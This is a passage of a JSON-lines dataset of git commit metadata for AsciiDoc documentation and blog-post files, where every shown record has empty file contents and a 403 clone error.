GarciaAlves\/elasticsearch,elancom\/elasticsearch,ckclark\/elasticsearch,jimczi\/elasticsearch,vroyer\/elassandra,chirilo\/elasticsearch,mcku\/elasticsearch,jpountz\/elasticsearch,mjason3\/elasticsearch,dylan8902\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,amit-shar\/elasticsearch,Brijeshrpatel9\/elasticsearch,Liziyao\/elasticsearch,wayeast\/elasticsearch,huanzhong\/elasticsearch,sreeramjayan\/elasticsearch,vietlq\/elasticsearch,lydonchandra\/elasticsearch,rento19962\/elasticsearch,vroyer\/elassandra,franklanganke\/elasticsearch,pritishppai\/elasticsearch,EasonYi\/elasticsearch,geidies\/elasticsearch,mbrukman\/elasticsearch,NBSW\/elasticsearch,franklanganke\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,yongminxia\/elasticsearch,rento19962\/elasticsearch,AshishThakur\/elasticsearch,liweinan0423\/elasticsearch,xingguang2013\/elasticsearch,zkidkid\/elasticsearch,kcompher\/elasticsearch,lzo\/elasticsearch-1,sreeramjayan\/elasticsearch,kalburgimanjunath\/elasticsearch,xpandan\/elasticsearch,Uiho\/elasticsearch,kunallimaye\/elasticsearch,pablocastro\/elasticsearch,mmaracic\/elasticsearch,clintongormley\/elasticsearch,sc0ttkclark\/elasticsearch,TonyChai24\/ESSource,F0lha\/elasticsearch,mgalushka\/elasticsearch,mapr\/elasticsearch,amaliujia\/elasticsearch,aglne\/elasticsearch,martinstuga\/elasticsearch,kenshin233\/elasticsearch,ivansun1010\/elasticsearch,sc0ttkclark\/elasticsearch,kevinkluge\/elasticsearch,Collaborne\/elasticsearch,kaneshin\/elasticsearch,JSCooke\/elasticsearch,Fsero\/elasticsearch,wimvds\/elasticsearch,ulkas\/elasticsearch,hanswang\/elasticsearch,zeroctu\/elasticsearch,ThalaivaStars\/OrgRepo1,Ansh90\/elasticsearch,mortonsykes\/elasticsearch,EasonYi\/elasticsearch,caengcjd\/elasticsearch,queirozfcom\/elasticsearch,wangtuo\/elasticsearch,pritishppai\/elasticsearch,JackyMai\/elasticsea
rch,kenshin233\/elasticsearch,javachengwc\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,episerver\/elasticsearch,onegambler\/elasticsearch,szroland\/elasticsearch,luiseduardohdbackup\/elasticsearch,YosuaMichael\/elasticsearch,sdauletau\/elasticsearch,Shekharrajak\/elasticsearch,pablocastro\/elasticsearch,fooljohnny\/elasticsearch,pranavraman\/elasticsearch,mgalushka\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,queirozfcom\/elasticsearch,jimczi\/elasticsearch,wbowling\/elasticsearch,franklanganke\/elasticsearch,tkssharma\/elasticsearch,huanzhong\/elasticsearch,uschindler\/elasticsearch,fernandozhu\/elasticsearch,phani546\/elasticsearch,mortonsykes\/elasticsearch,linglaiyao1314\/elasticsearch,areek\/elasticsearch,polyfractal\/elasticsearch,ImpressTV\/elasticsearch,mjason3\/elasticsearch,golubev\/elasticsearch,tsohil\/elasticsearch,lzo\/elasticsearch-1,javachengwc\/elasticsearch,Shekharrajak\/elasticsearch,EasonYi\/elasticsearch,vingupta3\/elasticsearch,IanvsPoplicola\/elasticsearch,apepper\/elasticsearch,sc0ttkclark\/elasticsearch,tkssharma\/elasticsearch,hirdesh2008\/elasticsearch,Collaborne\/elasticsearch,mapr\/elasticsearch,iantruslove\/elasticsearch,amaliujia\/elasticsearch,ydsakyclguozi\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,jaynblue\/elasticsearch,springning\/elasticsearch,mjhennig\/elasticsearch,HarishAtGitHub\/elasticsearch,geidies\/elasticsearch,huanzhong\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,dpursehouse\/elasticsearch,karthikjaps\/elasticsearch,rajanm\/elasticsearch,kalburgimanjunath\/elasticsearch,mm0\/elasticsearch,phani546\/elasticsearch,umeshdangat\/elasticsearch,ImpressTV\/elasticsearch,Fsero\/elasticsearch,fooljohnny\/elasticsearch,caengcjd\/elasticsearch,scottsom\/elasticsearch,ouyangkongtong\/elasticsearch,overcome\/elasticsearch,socialrank\/elasticsearch,mm0\/elasticsearch,Rygbee\/elasticsearch,humandb\/elasticsearch,obourgain\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,myelin\/elasticsearch,MaineC\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,myelin\/elasticsearch,nazarewk\/elasticsearch,wbowling\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,tahaemin\/elasticsearch,chirilo\/elasticsearch","old_file":"docs\/reference\/query-dsl\/bool-query.asciidoc","new_file":"docs\/reference\/query-dsl\/bool-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c6fc3fd30fbe893641ed06741c3a91f26b62f1d","subject":"Update 2016-02-29-Liste-questions-fonctionnelles.adoc","message":"Update 2016-02-29-Liste-questions-fonctionnelles.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-02-29-Liste-questions-fonctionnelles.adoc","new_file":"_posts\/2016-02-29-Liste-questions-fonctionnelles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be7f7048bdf07c76c40451d8b996ecb4e4c26d31","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 
2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cefd723660677e6450b4769ec6e25dc374ca2433","subject":"\u7ffb\u8bd1 testing-erroneous-cases","message":"\u7ffb\u8bd1 testing-erroneous-cases\n","repos":"iresty\/programming-openresty-zh","old_file":"testing\/testing-erroneous-cases.adoc","new_file":"testing\/testing-erroneous-cases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iresty\/programming-openresty-zh.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d449306c320247143aa2c14119c893df0b569ee6","subject":"Delete the file at '_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc'","message":"Delete the file at '_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f64757c58ffb747e6e12faf3897da50b531bc7a","subject":"Update 2017-01-05-A-JDBC-Gateway-Microservice.adoc","message":"Update 2017-01-05-A-JDBC-Gateway-Microservice.adoc","repos":"wiibaa\/wiibaa.github.io,wiibaa\/wiibaa.github.io,wiibaa\/wiibaa.github.io,wiibaa\/wiibaa.github.io","old_file":"_posts\/2017-01-05-A-JDBC-Gateway-Microservice.adoc","new_file":"_posts\/2017-01-05-A-JDBC-Gateway-Microservice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wiibaa\/wiibaa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82da04e56f3ad8d2b78113aec70d1c3fff25bf2","subject":"Worked on Systemd journal file format","message":"Worked on Systemd journal file format\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Systemd journal file format.asciidoc","new_file":"documentation\/Systemd journal file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"337556dccf06d7904487c324993175086451ca95","subject":"Small grammar fix","message":"Small grammar fix","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/05_contributors.adoc","new_file":"src\/docs\/manual\/05_contributors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7abda11eab61c382d797c07ea72da09ea5b91a82","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75f157ae2a6ee6699f1336f8f3320d6da69533f8","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-ping\/README.adoc","new_file":"plugins\/boteco-plugin-ping\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"746d5a807d92860a01c21a56fdd7674af937e745","subject":"Delete 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","message":"Delete 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e85b84f10d2589f11ab379e290417532f0d1129b","subject":"Update 2015-11-30-Getting-Google-Brillo-source-codes.adoc","message":"Update 2015-11-30-Getting-Google-Brillo-source-codes.adoc","repos":"geummo\/geummo.github.io,geummo\/geummo.github.io,geummo\/geummo.github.io","old_file":"_posts\/2015-11-30-Getting-Google-Brillo-source-codes.adoc","new_file":"_posts\/2015-11-30-Getting-Google-Brillo-source-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/geummo\/geummo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8baa7c17f205bcd3c035b2e503c40cfb879b24d2","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6183abaf5fa71ccf52c2bed39336b8248e80f8","subject":"Add initial SSL docs.","message":"Add initial SSL 
docs.\n","repos":"CrunchyData\/crunchy-proxy,CrunchyData\/crunchy-proxy,CrunchyData\/crunchy-proxy","old_file":"docs\/crunchy-proxy-ssl-guide.asciidoc","new_file":"docs\/crunchy-proxy-ssl-guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CrunchyData\/crunchy-proxy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b0d19b294b02c33667719ef37ec258550b522a0","subject":"chore: add initial gitignore","message":"chore: add initial gitignore\n","repos":"huitparfait\/huitparfait,huitparfait\/huitparfait,huitparfait\/huitparfait","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huitparfait\/huitparfait.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b7ebf2e18fb8b8731dc31f3bf551ff80ceb84d0d","subject":"Added Camel 2.21.2 release notes to docs","message":"Added Camel 2.21.2 release notes to docs\n","repos":"onders86\/camel,cunningt\/camel,kevinearls\/camel,apache\/camel,jamesnetherton\/camel,christophd\/camel,nikhilvibhav\/camel,adessaigne\/camel,pax95\/camel,punkhorn\/camel-upstream,sverkera\/camel,christophd\/camel,jamesnetherton\/camel,davidkarlsen\/camel,tdiesler\/camel,ullgren\/camel,cunningt\/camel,nikhilvibhav\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,kevinearls\/camel,ullgren\/camel,nikhilvibhav\/camel,zregvart\/camel,CodeSmell\/camel,nicolaferraro\/camel,CodeSmell\/camel,mcollovati\/camel,objectiser\/camel,sverkera\/camel,jamesnetherton\/camel,objectiser\/camel,nicolaferraro\/camel,alvinkwekel\/camel,tdiesler\/camel,pmoerenhout\/camel,sverkera\/camel,gnodet\/camel,onders86\/camel,cunningt\/camel,DariusX\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,anoordover\/camel,alvinkwekel\/camel,alvinkwekel\/camel,tadayosi\/camel,sverkera\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,pax95\/camel,onders86\/camel,gnodet\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,gnodet\/camel,zregvart\/camel,apache\/camel,jamesnetherton\/camel,pax95\/camel,CodeSmell\/camel,pax95\/camel,kevinearls\/camel,onders86\/camel,punkhorn\/camel-upstream,ullgren\/camel,adessaigne\/camel,DariusX\/camel,davidkarlsen\/camel,nicolaferraro\/camel,objectiser\/camel,zregvart\/camel,CodeSmell\/camel,cunningt\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,sverkera\/camel,mcollovati\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,anoordover\/camel,apache\/camel,Fabryprog\/camel,alvinkwekel\/camel,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,christophd\/camel,anoordover\/camel,kevinearls\/camel,punkhorn\/camel-upstream,DariusX\/camel,cunningt\/camel,mcollovati\/camel,onders86\/camel,pmoerenhout\/camel,jamesnetherton\/camel,davidkarlsen\/camel,davidkarlsen\/camel,anoordover\/camel,christophd\/camel,onders86\/camel,apache\/camel,tadayosi\/camel,sverkera\/camel,nicolaferraro\/camel,tdiesler\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,christophd\/camel,objectiser\/camel,pmoerenhout\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,Fabryprog\/camel,DariusX\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2212-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2212-release.adoc","new_contents":"","old_contents"
:"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fe441955db22b171a75fd8322f3a25fcdc3910e","subject":"Update 2016-01-25-Puzzle-7-C-U-B-E-S.adoc","message":"Update 2016-01-25-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-25-Puzzle-7-C-U-B-E-S.adoc","new_file":"_posts\/2016-01-25-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b7fba3f589283a1a4165bef8b95e53def36d505","subject":"Added upgrade docs CTR","message":"Added upgrade docs CTR\n","repos":"artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40009c0eb89dfe32142c5e3169134a60f8c48f84","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2c45ace3139caaa2343d2a6a241d1167d3097a5","subject":"Update 2015-12-13-Bai-vit-u-tien.adoc","message":"Update 2015-12-13-Bai-vit-u-tien.adoc","repos":"namlongwp\/namlongwp.github.io,namlongwp\/namlongwp.github.io,namlongwp\/namlongwp.github.io","old_file":"_posts\/2015-12-13-Bai-vit-u-tien.adoc","new_file":"_posts\/2015-12-13-Bai-vit-u-tien.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/namlongwp\/namlongwp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fd25f058b242ea6756041a7c7d84131b4983d9c","subject":"Update 2016-08-08-ECC-Review.adoc","message":"Update 
2016-08-08-ECC-Review.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-08-ECC-Review.adoc","new_file":"_posts\/2016-08-08-ECC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c96505ce8584c9a1eb4085d7d61c90c4203f6ef4","subject":"Update 2015-07-22-aboutJ2Objc.adoc","message":"Update 2015-07-22-aboutJ2Objc.adoc","repos":"chakbun\/chakbun.github.io,chakbun\/chakbun.github.io,chakbun\/chakbun.github.io","old_file":"_posts\/2015-07-22-aboutJ2Objc.adoc","new_file":"_posts\/2015-07-22-aboutJ2Objc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chakbun\/chakbun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ffa18acd6aa4db53c111b47814b955402b3e39","subject":"Update 2015-09-14-Hello-world.adoc","message":"Update 2015-09-14-Hello-world.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-Hello-world.adoc","new_file":"_posts\/2015-09-14-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e082c177d994f2f78b4ea12a1cca866cc84836a","subject":"Update 2016-05-02-Lonely-road.adoc","message":"Update 2016-05-02-Lonely-road.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-02-Lonely-road.adoc","new_file":"_posts\/2016-05-02-Lonely-road.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba9744300ff99e3f96f97e4bec64aa3ea532c35c","subject":"Deleted _posts\/2016-07-01-My-New-Blog.adoc","message":"Deleted _posts\/2016-07-01-My-New-Blog.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bd18b34c2f00e11f18e2abea0d1e005bda41aa4","subject":"Delete the file at '_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc'","message":"Delete the file at '_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc'","repos":"twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io","old_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twentyTwo\/twentyTwo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d26ed4439a2a17b71745d7833739310d43e8bc6","subject":"Update 
2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46efc0dedf7ea976e7e0952ab68e2ed8f436901f","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"341a73f6d601ec91a4b16416a09cd969701d678d","subject":"dump from riseup etherpad written in Mac lab","message":"dump from riseup etherpad written in Mac lab","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture03_20170911.adoc","new_file":"lecture03_20170911.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5ec1249e3483e5d0ed05f5365244ee5ab6495fe","subject":"Update 2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Update 2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"_posts\/2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9994ba3310c105028f94f8e1d994f8bb21eb7599","subject":"Grafana doc: mention availability (#244)","message":"Grafana doc: mention availability 
(#244)\n\n","repos":"jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a761ab17ea9fb5079c215a1577f668f675f5e752","subject":"Update 2017-08-14-August-14-2017.adoc","message":"Update 2017-08-14-August-14-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-08-14-August-14-2017.adoc","new_file":"_posts\/2017-08-14-August-14-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93f8c26744110c947131c5b0a494882ab24e405d","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"772d7c470b1f8317e37917fa0048a625c4da285b","subject":"y2b create post Google Wireless Charging Orb!","message":"y2b create post Google Wireless Charging Orb!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-19-Google-Wireless-Charging-Orb.adoc","new_file":"_posts\/2013-02-19-Google-Wireless-Charging-Orb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28a40c0c130ed0d7007f377f8141cb12b27af219","subject":"Update 2016-06-21-Reviewing-Exception-Handling.adoc","message":"Update 
